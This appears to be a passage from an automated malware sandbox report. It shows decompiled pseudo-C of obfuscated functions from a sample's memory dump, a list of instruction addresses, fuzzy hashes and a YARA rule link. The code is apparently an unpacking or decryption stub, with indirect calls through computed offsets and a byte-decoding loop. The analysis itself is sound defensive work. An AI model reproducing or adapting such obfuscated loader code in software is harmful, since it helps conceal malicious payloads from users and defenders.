					 *((intOrPtr*)(_t601 - 0xc)) = 0x11;
					_t146 = _t454 + 0x41d09f; // 0x41d09f
					 *_t611 =  *_t611 - _t559;
					 *_t611 =  *_t611 + _t146;
					_t445 =  *((intOrPtr*)(_t454 + 0x41f060))(_t559);
					 *(_t601 - 0x24) = _t504;
					 *((intOrPtr*)(_t454 + 0x41ce4e)) = _t445;
					_t471 =  *(_t601 - 0x24);
					 *((intOrPtr*)(_t601 - 0x18)) = 4;
					_t152 = _t454 + 0x41c4f7; // 0x41c4f7
					 *_t611 =  *_t611 ^ _t471;
					 *_t611 =  *_t611 + _t152;
					_t362 =  *((intOrPtr*)(_t454 + 0x41f060))(_t471);
					 *_t611 = _t553;
					 *(_t454 + 0x41c895) = 0 ^ _t362;
					_t519 = 0;
				}
				_t520 = _t519 ^ _t519;
				 *_t611 =  *_t611 - _t559;
				 *_t611 = _t520;
				_t201 = _t454 + 0x41c61d; // 0x41c61d
				 *_t611 =  *_t611 ^ _t585;
				 *_t611 = _t201;
				_t367 =  *((intOrPtr*)(_t454 + 0x41f060))(_t585, _t559, _t362);
				 *_t611 = _t367;
				_t204 = _t454 + 0x41cf67; // 0x41cf67
				 *(_t601 - 0x24) = 0;
				 *_t611 =  *_t611 ^ _t204;
				_t369 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t601 - 0x24),  *(_t601 - 0x1c));
				_pop( *_t208);
				_t473 = _t471 & 0x00000000 ^  *(_t601 - 0x24);
				 *(_t601 - 0x24) = _t559;
				_push(_t473 + _t369);
				_t562 =  *(_t601 - 0x24);
				_pop(_t370);
				_t475 = _t473 & 0x00000000 | _t601 & 0x00000000 ^  *(_t454 + 0x41c5dc);
				_t604 = _t601;
				if(_t475 > _t370) {
					_t213 = _t454 + 0x41c61d; // 0x41c61d
					 *(_t604 - 0x1c) = 0;
					 *_t611 =  *_t611 ^ _t213;
					_t216 = _t454 + 0x41cf67; // 0x41cf67
					 *(_t604 - 0x20) = 0;
					 *_t611 =  *_t611 | _t216;
					_t403 =  *((intOrPtr*)(_t454 + 0x41f064))( *(_t604 - 0x20),  *(_t604 - 0x1c));
					 *(_t604 - 0x1c) = _t475;
					 *((intOrPtr*)(_t454 + 0x41cf4f)) = _t403;
					_t475 =  *(_t604 - 0x1c);
				}
				_t612 =  &(_t611[1]);
				 *_t612 = _t475;
				_t478 = 0;
				 *_t612 = _t520 & 0x00000000 |  *_t611;
				_t225 = _t454 + 0x41cef6; // 0x41cef6
				 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
				 *_t612 =  *_t612 | _t225;
				_t229 = _t454 + 0x41ceb9; // 0x41ceb9
				 *_t612 =  *_t612 ^ _t604;
				 *_t612 =  *_t612 ^ _t229;
				_t374 =  *((intOrPtr*)(_t454 + 0x41f068))(_t604,  *(_t604 - 0x1c),  *(_t604 - 0x24));
				 *(_t454 + 0x41caf5) =  *(_t454 + 0x41caf5) & 0x00000000;
				 *(_t454 + 0x41caf5) =  *(_t454 + 0x41caf5) | _t478 ^  *_t612 | _t374;
				_t481 = _t478;
				_t613 = _t612 - 0xfffffffc;
				_t525 = _t374 %  *(_t604 - 0x18);
				 *_t613 =  *_t613 & 0x00000000;
				 *_t613 =  *_t613 | _t525;
				_t241 = _t454 + 0x41c52d; // 0x41c52d
				 *(_t604 - 0x24) = 0;
				 *_t613 =  *_t613 ^ _t241;
				_t377 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t604 - 0x24), _t481);
				 *(_t454 + 0x41d106) =  *(_t454 + 0x41d106) & 0x00000000;
				 *(_t454 + 0x41d106) =  *(_t454 + 0x41d106) | _t525 & 0x00000000 | _t377;
				_t528 = _t525;
				_t530 = _t528 & 0x00000000 ^  *_t613;
				_t614 = _t613 - 0xfffffffc;
				 *((intOrPtr*)(_t604 - 4)) =  *((intOrPtr*)(_t604 - 4)) - _t530;
				 *(_t604 - 0x24) = 0;
				 *_t614 =  *_t614 | _t530;
				_t253 = _t454 + 0x41c7ee; // 0x41c7ee
				 *_t614 =  *_t614 ^ _t562;
				 *_t614 =  *_t614 ^ _t253;
				_t254 = _t454 + 0x41c513; // 0x41c513
				 *(_t604 - 0x20) = 0;
				 *_t614 =  *_t614 | _t254;
				_t380 =  *((intOrPtr*)(_t454 + 0x41f068))( *(_t604 - 0x20), _t562,  *(_t604 - 0x24), _t481);
				 *(_t604 - 0x20) = _t585;
				 *(_t454 + 0x41c2a8) =  *(_t454 + 0x41c2a8) & 0x00000000;
				 *(_t454 + 0x41c2a8) =  *(_t454 + 0x41c2a8) ^ _t585 & 0x00000000 ^ _t380;
				_t532 =  *_t614;
				_t615 =  &(_t614[1]);
				 *(_t604 - 0x1c) = _t380;
				 *(_t604 - 0x14) =  *(_t604 - 0x14) & 0x00000000;
				 *(_t604 - 0x14) =  *(_t604 - 0x14) | _t380 ^  *(_t604 - 0x1c) ^ _t532;
				_t271 = _t454 + 0x41ccc7; // 0x41ccc7
				 *(_t604 - 0x24) = 0;
				 *_t615 =  *_t615 | _t271;
				_t385 =  *((intOrPtr*)(_t454 + 0x41f060))( *(_t604 - 0x24));
				 *(_t454 + 0x41cca4) =  *(_t454 + 0x41cca4) & 0x00000000;
				 *(_t454 + 0x41cca4) =  *(_t454 + 0x41cca4) | _t562 -  *_t615 | _t385;
				_t565 = _t562;
				_t590 =  *(_t604 - 0x20) & 0x00000000 ^ _t454 & 0x00000000 ^  *(_t604 + 8);
				_t457 = _t454;
				_t280 = _t457 + 0x41c550; // 0x41c550
				 *(_t604 - 0x20) = 0;
				 *_t615 =  *_t615 + _t280;
				_t387 =  *((intOrPtr*)(_t457 + 0x41f060))( *(_t604 - 0x20));
				 *(_t604 - 0x20) = 0;
				 *_t615 =  *_t615 + _t387;
				_t286 = _t457 + 0x41d34c; // 0x41d34c
				 *_t615 = _t286;
				_t389 =  *((intOrPtr*)(_t457 + 0x41f060))( *(_t604 - 0x20),  *(_t604 - 0x20));
				_t616 = _t615 - 0xfffffffc;
				 *_t289 = _t389;
				 *(_t604 - 0x24) =  *(_t604 - 0x24) + (0 ^  *_t615);
				_push( *(_t604 - 0x24));
				_pop(_t390);
				_t534 = _t532;
				 *(_t604 - 0x1c) = _t534;
				_t537 =  *(_t604 - 0x1c);
				if( *((intOrPtr*)(_t457 + 0x41ccf8)) > _t390) {
					_t296 = _t457 + 0x41c550; // 0x41c550
					 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
					 *_t616 =  *_t616 + _t296;
					_t300 = _t457 + 0x41d34c; // 0x41d34c
					 *(_t604 - 0x1c) =  *(_t604 - 0x1c) & 0x00000000;
					 *_t616 =  *_t616 + _t300;
					_t390 =  *((intOrPtr*)(_t457 + 0x41f064))( *(_t604 - 0x1c),  *(_t604 - 0x1c));
				}
				 *(_t604 - 0x24) = _t537;
				 *((intOrPtr*)(_t457 + 0x41ce46)) = _t390;
				_t540 =  *(_t604 - 0x24);
				 *(_t604 - 0x1c) = _t540;
				_t310 = _t457 + 0x41cb9d; // 0x41cb9d
				 *_t616 =  *_t616 - _t590;
				 *_t616 =  *_t616 | _t310;
				_t311 = _t457 + 0x41cd17; // 0x41cd17
				 *(_t604 - 0x20) =  *(_t604 - 0x20) & 0x00000000;
				 *_t616 =  *_t616 | _t311;
				_t393 =  *((intOrPtr*)(_t457 + 0x41f068))( *(_t604 - 0x20), _t590);
				 *_t616 = _t565 & 0x00000000 | _t540 & 0x00000000 ^ _t590;
				 *(_t457 + 0x41d015) = 0 ^ _t393;
				_t570 = 0;
				_t591 = _t590 - 1;
				 *(_t604 - 0x1c) = 0;
				_push( *(_t604 - 0x1c));
				 *_t616 =  *_t616 | _t457;
				do {
					 *_t319 = _t570;
					_t488 =  *(_t604 - 0x20);
					_t489 = _t488 &  *(_t604 - 8);
					if(_t489 == 0) {
						_t591 = _t591 + 1;
						_t393 = _t393 & 0x00000000 ^ (_t570 -  *_t616 |  *(_t604 - 0x18));
						_t570 = _t570;
						_t457 =  *(_t393 + _t591) & 0x000000ff;
					}
					 *_t325 =  *((intOrPtr*)(_t604 - 0xc));
					_t544 =  *(_t604 - 0x20);
					asm("rol edx, cl");
					asm("lodsb");
					_t393 = _t393 | _t544 & _t457;
					 *_t570 = _t393;
					_t570 = _t570 + 1;
					_t327 = _t604 - 4;
					 *_t327 =  *((intOrPtr*)(_t604 - 4)) - 1;
				} while ( *_t327 != 0);
				_t459 =  *_t616;
				_t617 =  &(_t616[1]);
				_t329 = _t459 + 0x41cc0b; // 0x41cc0b
				 *_t617 =  *_t617 & 0x00000000;
				 *_t617 =  *_t617 ^ _t329;
				_t330 = _t459 + 0x41cbd0; // 0x41cbd0
				 *_t617 =  *_t617 & 0x00000000;
				 *_t617 =  *_t617 | _t330;
				_t397 =  *((intOrPtr*)(_t459 + 0x41f068))(_t604, _t489);
				 *(_t604 - 0x20) = _t489;
				 *(_t459 + 0x41d326) =  *(_t459 + 0x41d326) & 0x00000000;
				 *(_t459 + 0x41d326) =  *(_t459 + 0x41d326) ^ (_t489 ^  *(_t604 - 0x20) | _t397);
				 *(_t604 - 0x1c) = _t459;
				return memcpy(_t570, _t591 + 1,  *(_t604 - 0x14));
			}

0x00ea3fab
0x00ea3fab
0x00ea3fb1
0x00ea3fb5
0x00ea3fb8
0x00ea3fc1
0x00ea3fc2
0x00ea3fc5
0x00ea3fc8
0x00ea3fd4
0x00ea3fd5
0x00ea3fd9
0x00ea3fe2
0x00ea3fe5
0x00ea3fe8
0x00ea3fee
0x00ea3ff6
0x00ea3ffd
0x00ea4003
0x00ea400b
0x00ea400e
0x00ea4015
0x00ea4018
0x00ea4021
0x00ea4024
0x00ea402d
0x00ea4031
0x00ea4034
0x00ea4037
0x00ea403d
0x00ea4044
0x00ea404d
0x00ea4053
0x00ea4056
0x00ea405f
0x00ea4060
0x00ea4063
0x00ea406c
0x00ea4073
0x00ea4076
0x00ea4079
0x00ea407f
0x00ea4086
0x00ea408c
0x00ea4098
0x00ea40a1
0x00ea40a8
0x00ea40ae
0x00ea40b5
0x00ea40b6
0x00ea40ba
0x00ea40bd
0x00ea40c3
0x00ea40ca
0x00ea40cd
0x00ea40d6
0x00ea40dd
0x00ea40e0
0x00ea40e3
0x00ea40f2
0x00ea40f7
0x00ea40fb
0x00ea40fe
0x00ea4100
0x00ea4103
0x00ea410e
0x00ea4110
0x00ea4113
0x00ea411b
0x00ea411c
0x00ea411f
0x00ea4128
0x00ea412f
0x00ea4132
0x00ea4135
0x00ea4135
0x00ea4141
0x00ea4148
0x00ea414e
0x00ea4153
0x00ea446d
0x00ea4473
0x00ea447c
0x00ea447f
0x00ea4486
0x00ea448a
0x00ea4493
0x00ea4494
0x00ea4497
0x00ea449a
0x00ea44a0
0x00ea44a7
0x00ea44ad
0x00ea44b4
0x00ea44b7
0x00ea44bd
0x00ea44c5
0x00ea44cc
0x00ea44d2
0x00ea44d5
0x00ea44dc
0x00ea44e2
0x00ea44e9
0x00ea44ec
0x00ea44f2
0x00ea44fa
0x00ea4501
0x00ea4507
0x00ea450a
0x00ea4511
0x00ea4517
0x00ea451e
0x00ea4521
0x00ea4528
0x00ea452b
0x00ea452e
0x00ea4534
0x00ea453c
0x00ea4543
0x00ea4549
0x00ea4549
0x00ea4159
0x00ea4159
0x00ea415f
0x00ea4169
0x00ea416c
0x00ea4172
0x00ea417c
0x00ea417f
0x00ea418b
0x00ea4192
0x00ea4198
0x00ea4199
0x00ea419f
0x00ea41a6
0x00ea41a9
0x00ea41af
0x00ea41b6
0x00ea41b9
0x00ea41c2
0x00ea41c5
0x00ea41ce
0x00ea41d1
0x00ea41dd
0x00ea41e0
0x00ea41e5
0x00ea41e9
0x00ea41ec
0x00ea41ee
0x00ea41fc
0x00ea41fe
0x00ea4201
0x00ea4203
0x00ea420a
0x00ea420e
0x00ea4211
0x00ea4217
0x00ea421e
0x00ea4221
0x00ea422d
0x00ea4234
0x00ea423a
0x00ea423a
0x00ea4240
0x00ea4244
0x00ea4248
0x00ea424b
0x00ea4252
0x00ea4255
0x00ea4258
0x00ea4261
0x00ea4264
0x00ea426a
0x00ea4272
0x00ea4279
0x00ea427f
0x00ea4282
0x00ea4289
0x00ea428c
0x00ea428f
0x00ea4296
0x00ea4299
0x00ea429c
0x00ea42a3
0x00ea42a7
0x00ea42aa
0x00ea42b1
0x00ea42b4
0x00ea42b7
0x00ea42c6
0x00ea42c9
0x00ea42d0
0x00ea42d6
0x00ea42d9
0x00ea42e0
0x00ea42e6
0x00ea42f0
0x00ea42f3
0x00ea42fa
0x00ea42fd
0x00ea4300
0x00ea4306
0x00ea430d
0x00ea4310
0x00ea431c
0x00ea431f
0x00ea4322
0x00ea4329
0x00ea432a
0x00ea432d
0x00ea432e
0x00ea433d
0x00ea433f
0x00ea4344
0x00ea4346
0x00ea434c
0x00ea4353
0x00ea4356
0x00ea435c
0x00ea4366
0x00ea4369
0x00ea4369
0x00ea4371
0x00ea4378
0x00ea437e
0x00ea437f
0x00ea4386
0x00ea438d
0x00ea4390
0x00ea4393
0x00ea4399
0x00ea43a0
0x00ea43a6
0x00ea43a9
0x00ea43b0
0x00ea43b7
0x00ea43ba
0x00ea43bd
0x00ea43c5
0x00ea43cc
0x00ea43d2
0x00ea43d2
0x00ea4551
0x00ea4555
0x00ea4558
0x00ea455b
0x00ea4562
0x00ea4565
0x00ea4568
0x00ea4571
0x00ea4574
0x00ea457a
0x00ea4584
0x00ea4587
0x00ea4593
0x00ea4596
0x00ea4599
0x00ea45a0
0x00ea45a1
0x00ea45a4
0x00ea45b2
0x00ea45b4
0x00ea45b7
0x00ea45b9
0x00ea45bf
0x00ea45c9
0x00ea45cc
0x00ea45d2
0x00ea45dc
0x00ea45df
0x00ea45e5
0x00ea45ec
0x00ea45f2
0x00ea45f2
0x00ea45fe
0x00ea4603
0x00ea460d
0x00ea4611
0x00ea4614
0x00ea461a
0x00ea4621
0x00ea4624
0x00ea462b
0x00ea462e
0x00ea4631
0x00ea463d
0x00ea4644
0x00ea464a
0x00ea4654
0x00ea4657
0x00ea465b
0x00ea465f
0x00ea4662
0x00ea4668
0x00ea4672
0x00ea4675
0x00ea4681
0x00ea4688
0x00ea468e
0x00ea4695
0x00ea4698
0x00ea46a1
0x00ea46a5
0x00ea46af
0x00ea46b2
0x00ea46b9
0x00ea46bc
0x00ea46bf
0x00ea46c5
0x00ea46cf
0x00ea46d2
0x00ea46d8
0x00ea46e0
0x00ea46e7
0x00ea46f2
0x00ea46f5
0x00ea46f8
0x00ea4700
0x00ea4704
0x00ea470a
0x00ea4710
0x00ea471a
0x00ea471d
0x00ea4729
0x00ea4730
0x00ea4736
0x00ea4741
0x00ea4743
0x00ea4744
0x00ea474a
0x00ea4754
0x00ea4757
0x00ea475d
0x00ea4767
0x00ea476a
0x00ea4773
0x00ea4776
0x00ea4781
0x00ea4788
0x00ea478b
0x00ea478e
0x00ea4791
0x00ea4792
0x00ea4793
0x00ea47a0
0x00ea47a5
0x00ea47a7
0x00ea47ad
0x00ea47b4
0x00ea47b7
0x00ea47bd
0x00ea47c4
0x00ea47c7
0x00ea47c7
0x00ea47cd
0x00ea47d4
0x00ea47da
0x00ea47dd
0x00ea47ed
0x00ea47f4
0x00ea47f7
0x00ea47fa
0x00ea4800
0x00ea4807
0x00ea480a
0x00ea4812
0x00ea4819
0x00ea481f
0x00ea4820
0x00ea4821
0x00ea4828
0x00ea482b
0x00ea482e
0x00ea482f
0x00ea4835
0x00ea4836
0x00ea4839
0x00ea483b
0x00ea4846
0x00ea4848
0x00ea4849
0x00ea4849
0x00ea4850
0x00ea4856
0x00ea4857
0x00ea485b
0x00ea485c
0x00ea485e
0x00ea4860
0x00ea4861
0x00ea4861
0x00ea4861
0x00ea4868
0x00ea486b
0x00ea486e
0x00ea4875
0x00ea4879
0x00ea487c
0x00ea4883
0x00ea4887
0x00ea488a
0x00ea4890
0x00ea4898
0x00ea489f
0x00ea48a8
0x00ea48c1

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e380f32c42c4f0e1bdcf2094019efc4a4f59e296a005b21612e1bc21532986cf
Instruction ID: 8ef5f7f52ad5fababa95eefd317f3776faa08891aa85182a46eefe3aa8292646
Opcode Fuzzy Hash: e380f32c42c4f0e1bdcf2094019efc4a4f59e296a005b21612e1bc21532986cf
Instruction Fuzzy Hash: 4C4224728442088FEF04DFA4C88A7EEBBF1FF48310F19856ED889AA155D7385525CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00EA1CD0, Relevance: .6, Instructions: 565
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00EA1CD0(void* __ebx, signed int __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t326;
				signed int _t329;
				void* _t331;
				void* _t332;
				signed int _t336;
				signed int _t339;
				signed int _t344;
				signed int _t345;
				signed int _t348;
				intOrPtr _t353;
				signed int _t356;
				signed int _t359;
				void* _t361;
				void* _t362;
				signed int _t367;
				signed int _t368;
				signed int _t370;
				void* _t372;
				void* _t373;
				void* _t377;
				intOrPtr _t378;
				intOrPtr _t380;
				signed int _t382;
				signed int _t385;
				signed int _t387;
				void* _t389;
				signed int _t390;
				signed int _t392;
				signed int _t395;
				void* _t397;
				void* _t399;
				signed int _t400;
				signed int _t415;
				signed int _t418;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t427;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t444;
				signed int _t446;
				signed int _t453;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t467;
				signed int _t470;
				signed int _t476;
				signed int _t479;
				signed int _t482;
				signed int _t485;
				void* _t489;
				signed int _t491;
				signed int _t494;
				signed int _t497;
				signed int _t499;
				signed int _t502;
				signed int _t504;
				signed int _t507;
				signed int _t510;
				signed int _t513;
				void* _t516;
				signed int _t518;
				signed int _t529;
				signed int _t532;
				signed int _t535;
				signed int _t537;
				signed int _t540;
				signed int _t543;
				signed int _t546;
				signed int _t549;
				signed int _t552;
				void* _t561;
				void* _t565;
				signed int _t566;
				void* _t569;
				signed int _t572;
				signed int _t576;
				signed int* _t577;
				signed int* _t578;
				signed int* _t579;
				signed int* _t580;
				signed int* _t581;
				signed int* _t582;
				signed int* _t583;

				_t467 = __edx;
				_t422 = __ebx;
				_push(__esi);
				 *_t576 =  *_t576 & 0x00000000;
				 *_t576 =  *_t576 + _t565;
				_t566 = _t576;
				_t577 = _t576 + 0xfffffff0;
				_v20 = 0;
				_push(_v20);
				 *_t577 =  *_t577 + __ebx + 0x41d081;
				_t326 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(__esi);
				 *(__ebx + 0x41d148) =  *(__ebx + 0x41d148) & 0x00000000;
				 *(__ebx + 0x41d148) =  *(__ebx + 0x41d148) | __esi -  *_t577 ^ _t326;
				_pop(_t529);
				_push(__ebx);
				 *_t577 =  *_t577 & 0x00000000;
				 *_t577 =  *_t577 + __ebx + 0x41c850;
				_push(_v16);
				 *_t577 = __ebx + 0x41cbc9;
				_t329 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(__ebx);
				 *_t577 =  *_t577 - __ebx;
				 *_t577 = _t329;
				_push(__edi);
				 *_t577 =  *_t577 ^ __edi;
				 *_t577 =  *_t577 + __ebx + 0x41cab2;
				_t331 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_pop( *_t15);
				_push(__edi);
				 *_t17 = _t331;
				_v12 = _v12 + (__ecx & 0x00000000 | _v20);
				_push(_v12);
				_pop(_t332);
				_pop(_t497);
				_push( *((intOrPtr*)(__ebx + 0x41ca2b)));
				_pop( *_t22);
				_push(_v16);
				_pop(_t431);
				if(_t431 > _t332) {
					_v20 = 0;
					_push(_v20);
					 *_t577 =  *_t577 + __ebx + 0x41cbc9;
					_push(_v20);
					 *_t577 = __ebx + 0x41cab2;
					_t421 =  *((intOrPtr*)(__ebx + 0x41f064))();
					_v20 = _t431;
					 *(__ebx + 0x41ce2d) = 0 ^ _t421;
					_t431 = _v20;
				}
				_t578 = _t577 - 0xfffffffc;
				 *_t578 =  *_t578 & 0x00000000;
				 *_t578 =  *_t578 |  *_t577;
				_v20 = 0;
				 *_t578 =  *_t578 ^ _t422 + 0x0041c95a;
				_t336 =  *((intOrPtr*)(_t422 + 0x41f060))(_v20, _t566);
				_v20 = _t467;
				 *(_t422 + 0x41cd3d) = 0 ^ _t336;
				_t470 = _v20;
				 *_t578 =  *_t578 & 0x00000000;
				 *_t578 =  *_t578 ^ _t422 + 0x0041c799;
				 *_t578 =  *_t578 ^ _t431;
				 *_t578 =  *_t578 ^ _t422 + 0x0041d050;
				_t339 =  *((intOrPtr*)(_t422 + 0x41f060))(_t431, _t529);
				_v20 = _t529;
				 *(_t422 + 0x41d0f6) =  *(_t422 + 0x41d0f6) & 0x00000000;
				 *(_t422 + 0x41d0f6) =  *(_t422 + 0x41d0f6) ^ _t529 & 0x00000000 ^ _t339;
				_t532 = _v20;
				_t579 =  &(_t578[1]);
				_v20 = 0;
				 *_t579 =  *_t579 + (_t339 & 0x00000000) +  *_t578;
				_v16 = _v16 & 0x00000000;
				 *_t579 =  *_t579 + _t422 + 0x41c952;
				_v16 = 0;
				 *_t579 =  *_t579 ^ _t422 + 0x0041cbdd;
				_t344 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v16, _v20);
				_v20 = _t532;
				 *(_t422 + 0x41c459) =  *(_t422 + 0x41c459) & 0x00000000;
				 *(_t422 + 0x41c459) =  *(_t422 + 0x41c459) | _t532 - _v20 | _t344;
				_t535 = _v20;
				_t345 =  *((intOrPtr*)(_t422 + 0x41f068))();
				 *_t579 = _t345;
				_v12 = _v12 & 0x00000000;
				 *_t579 =  *_t579 ^ _t422 + 0x0041c361;
				_v16 = _v16 & 0x00000000;
				 *_t579 =  *_t579 + _t422 + 0x41c569;
				_t348 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v12, _v20);
				_v20 = _t470;
				 *(_t422 + 0x41ca96) =  *(_t422 + 0x41ca96) & 0x00000000;
				 *(_t422 + 0x41ca96) =  *(_t422 + 0x41ca96) | _t470 & 0x00000000 ^ _t348;
				_t580 =  &(_t579[1]);
				 *(_t422 + 0x41d322) =  *(_t422 + 0x41d322) & 0x00000000;
				 *(_t422 + 0x41d322) =  *(_t422 + 0x41d322) | _t566 ^  *_t580 |  *_t579;
				_t569 = _t566;
				_v12 = _v12 & 0x00000000;
				 *_t580 =  *_t580 + _t422 + 0x41c29c;
				_v16 = 0;
				 *_t580 =  *_t580 + _t422 + 0x41c80d;
				_t353 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v12);
				_v12 = _v20;
				 *((intOrPtr*)(_t422 + 0x41c28c)) = _t353;
				_t476 = _v12;
				 *_t580 = _t497;
				 *_t580 = _t422 + 0x41ce81;
				 *_t580 = _t422 + 0x41cad0;
				_t356 =  *((intOrPtr*)(_t422 + 0x41f068))(_v20, _v20, _v20);
				 *(_t422 + 0x41c00b) =  *(_t422 + 0x41c00b) & 0x00000000;
				 *(_t422 + 0x41c00b) =  *(_t422 + 0x41c00b) | _t476 ^  *_t580 | _t356;
				_t479 = _t476;
				 *_t580 =  *_t580 - _t497;
				 *_t580 = _t422 + 0x41c333;
				_v12 = _v12 & 0x00000000;
				 *_t580 =  *_t580 | _t422 + 0x0041c5ab;
				_t359 =  *((intOrPtr*)(_t422 + 0x41f060))(_v12, _t497);
				 *_t580 = _t359;
				 *_t580 =  *_t580 - _t535;
				 *_t580 =  *_t580 | _t422 + 0x0041cfa2;
				_t361 =  *((intOrPtr*)(_t422 + 0x41f060))(_v12);
				 *_t117 = _t535;
				_t432 = _v16;
				 *_t119 = _t361;
				_v16 = _v16 + _t432;
				_push(_v16);
				_pop(_t362);
				_t499 = _t497;
				_v12 = _t499;
				_t434 = _t432 & 0x00000000 | _t499 ^ _v12 ^  *(_t422 + 0x41ce17);
				_t502 = _v12;
				if(_t434 > _t362) {
					 *_t580 = _t422 + 0x41c5ab;
					_v20 = 0;
					 *_t580 =  *_t580 | _t422 + 0x0041cfa2;
					_t418 =  *((intOrPtr*)(_t422 + 0x41f064))(_v20, _v16);
					_v20 = _t502;
					 *(_t422 + 0x41cc6a) = 0 ^ _t418;
					_t502 = _v20;
				}
				_pop( *_t136);
				 *_t580 = 0 ^ _v16;
				 *_t580 =  *_t580 - _t535;
				 *_t580 =  *_t580 + _t422 + 0x41d2cb;
				 *_t580 =  *_t580 & 0x00000000;
				 *_t580 =  *_t580 | _t422 + 0x0041d0da;
				_t367 =  *((intOrPtr*)(_t422 + 0x41f068))(_t422, _t535, _v16);
				 *(_t422 + 0x41c44e) =  *(_t422 + 0x41c44e) & 0x00000000;
				 *(_t422 + 0x41c44e) =  *(_t422 + 0x41c44e) | _t434 & 0x00000000 | _t367;
				_t437 = _t434;
				_t368 =  *((intOrPtr*)(_t422 + 0x41f060))();
				 *_t580 = _t368;
				_v16 = 0;
				 *_t580 =  *_t580 ^ _t422 + 0x0041d2e3;
				_t370 =  *((intOrPtr*)(_t422 + 0x41f060))(_v16, _v12);
				_v16 = 0;
				 *_t580 =  *_t580 ^ _t370;
				 *_t580 =  *_t580 & 0x00000000;
				 *_t580 =  *_t580 ^ _t422 + 0x0041cf21;
				_t372 =  *((intOrPtr*)(_t422 + 0x41f060))(_v16);
				 *_t156 = _t569;
				_t439 = (_t437 & 0x00000000) + _v20;
				 *_t158 = _t372;
				_v12 = _v12 + _t439;
				_push(_v12);
				_pop(_t373);
				_t424 = _t422;
				_v20 = _t479;
				_t441 = _t439 & 0x00000000 | _t479 & 0x00000000 |  *(_t424 + 0x41d124);
				_t482 = _v20;
				if(_t441 > _t373) {
					_t165 = _t424 + 0x41d2e3; // 0x41d2e3
					 *_t580 =  *_t580 & 0x00000000;
					 *_t580 =  *_t580 | _t165;
					_t166 = _t424 + 0x41cf21; // 0x41cf21
					 *_t580 = _t166;
					_t415 =  *((intOrPtr*)(_t424 + 0x41f064))(_v20, _t482);
					_v12 = _t441;
					 *(_t424 + 0x41c275) = 0 ^ _t415;
					_t441 = _v12;
				}
				_pop( *_t172);
				_v12 = _v12 & 0x00000000;
				 *_t580 =  *_t580 ^ _v16;
				_t177 = _t424 + 0x41c5c8; // 0x41c5c8
				_v16 = _v16 & 0x00000000;
				 *_t580 =  *_t580 | _t177;
				_t377 =  *((intOrPtr*)(_t424 + 0x41f060))(_v16, _v12);
				_t581 =  &(_t580[1]);
				 *_t182 = _t377;
				_v20 = _v20 + (_t441 & 0x00000000 ^  *_t580);
				_push(_v20);
				_pop(_t378);
				_t537 = _t535;
				 *_t581 = _t537;
				_t444 = 0 ^  *(_t424 + 0x41c106);
				_t540 = 0;
				if(_t444 > _t378) {
					_t187 = _t424 + 0x41c333; // 0x41c333
					_v12 = 0;
					 *_t581 =  *_t581 | _t187;
					_t190 = _t424 + 0x41c5c8; // 0x41c5c8
					 *_t581 =  *_t581 ^ _t444;
					 *_t581 = _t190;
					_t378 =  *((intOrPtr*)(_t424 + 0x41f064))(_t444, _v12);
				}
				_v16 = _t540;
				 *((intOrPtr*)(_t424 + 0x41c594)) = _t378;
				_t543 = _v16;
				_t446 = _t444 & 0x00000000 ^ (_t424 ^  *_t581 | _a4);
				_t427 = _t424;
				_v12 = 0;
				 *_t581 =  *_t581 + _t446;
				_t198 = _t427 + 0x41ccb8; // 0x41ccb8
				_v12 = 0;
				 *_t581 =  *_t581 | _t198;
				_t380 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, _v12);
				_v20 = _t446;
				 *((intOrPtr*)(_t427 + 0x41cb42)) = _t380;
				_pop( *_t205);
				_t504 = _t502 & 0x00000000 | _t482 -  *_t581 | _v16;
				_t485 = _t482;
				_t207 = _t427 + 0x41d2a5; // 0x41d2a5
				 *_t581 =  *_t581 ^ _t504;
				 *_t581 =  *_t581 ^ _t207;
				_t382 =  *((intOrPtr*)(_t427 + 0x41f060))(_t504);
				 *(_t427 + 0x41cba6) =  *(_t427 + 0x41cba6) & 0x00000000;
				 *(_t427 + 0x41cba6) =  *(_t427 + 0x41cba6) | _t504 & 0x00000000 ^ _t382;
				_t507 = _t504;
				_t572 = _t569;
				_t213 = _t427 + 0x41c4f4; // 0x41c4f4
				_v16 = _v16 & 0x00000000;
				 *_t581 =  *_t581 | _t213;
				_t217 = _t427 + 0x41c4e9; // 0x41c4e9
				 *_t581 =  *_t581 ^ _t485;
				 *_t581 = _t217;
				_t385 =  *((intOrPtr*)(_t427 + 0x41f068))(_t485, _v16);
				_v12 = _t543;
				 *(_t427 + 0x41cc3a) =  *(_t427 + 0x41cc3a) & 0x00000000;
				 *(_t427 + 0x41cc3a) =  *(_t427 + 0x41cc3a) ^ (_t543 ^ _v12 | _t385);
				_t546 = _v12;
				_v16 = _t485;
				_v8 = _t507;
				_t229 = _t427 + 0x41c0f6; // 0x41c0f6
				 *_t581 = _t229;
				_t387 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20);
				 *_t581 = _t387;
				_t233 = _t427 + 0x41c3d8; // 0x41c3d8
				_v20 = _v20 & 0x00000000;
				 *_t581 =  *_t581 ^ _t233;
				_t389 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20, _v12);
				_t453 =  *_t581;
				_t582 =  &(_t581[1]);
				 *_t582 =  *_t582 + _v16;
				_t489 = _t389;
				_t390 = _t489 + _t453;
				_t491 = 0;
